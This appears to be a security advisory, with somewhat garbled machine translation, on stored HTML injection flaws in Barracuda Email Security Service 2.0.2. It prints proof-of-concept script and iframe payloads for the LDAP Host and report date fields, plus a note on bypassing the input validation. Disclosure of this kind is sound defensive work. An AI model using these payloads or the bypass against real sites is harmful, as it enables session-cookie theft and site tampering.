Multiple HTML injection vulnerabilities in Barracuda Email Security Service

Release date: 2012-08-02
Updated on:

Affected Systems:
Barracuda Networks Email Security Service 2.0.2
Barracuda Networks Email Security Service
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54773

Barracuda Email Security Service is a cloud-based Email Security Service.

Barracuda Email Security Service 2.0.2 and other versions have multiple HTML Injection Vulnerabilities. Attackers can exploit these vulnerabilities to inject malicious HTML and script code, attackers can steal Cookie authentication creden。 or control the appearance of the site.

<* Source: Benjamin Kunz Mejri
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Benjamin Kunz Mejri () provides the following test methods:

Proof of Concept:
========================
1.1
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce...

Review: Domain Settings> Directory Services> LDAP Host

<Div id = "directory-services" class = "module">
<H4 class = "module-title"> Directory Services <Div class = "module-content">
<Div class = "warn notice" id = "ldap-test-result" style = ""> Alt = "loading... "> Connecting to>" <iframe src = "http://www.example1.com"> @ gmail.com> "<script> alert (document. cookie) </script> <div style = "1@gmail.com 0 </iframe> </div>
<Div style = "float: right;">
<A href = "https://www.example2.com/domains/sync_ldap/4" class = "btn"> <span> Synchronize Now </span> </a>
<A href = "#" class = "btn" id = "ldap-test-btn"> <span> Test Settings </span> </ a>
</Div>
<P class = "field">
<Label class = "label" for = "ldap_host"> LDAP Host: </label>
<Input name = "ldap_host" id = "ldap_host" size = "30" value = ">
<Iframe src = http://www.example1.com> @ gmail.com> "<script> alert (document. cookie) </script> <
Div style = "1@gmail.com 0" type = "text">

URL: https://www.example.com/domains/info/4

PoC:> ">" <iframe src = http://www.example1.com> VL> "<div style =" 1> ">"

Note:
To bypass the validation close the tag of the exception handling on beginning with double quotes 2 times.
The mask of the exception (> ") will be bypassed and the string will be executed out of the secure exception handling message.

 

1.2
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce...

Vulnerable Module: Reports> Date Start> Date End

PoC: & gt; & quot; <iframe src = http://www.example1.com>

URL: https://www.example.com/reports

Note:
1. Include a start Date & End Date
2. Inject after the start date & end date your own persistent script code
3. Result: The script code get executed out of the date listing application context
4. Save value with script code to events for exploitation via module.

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Barracuda Networks
------------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.barracudanetworks.com/ns/products/spam_overview.php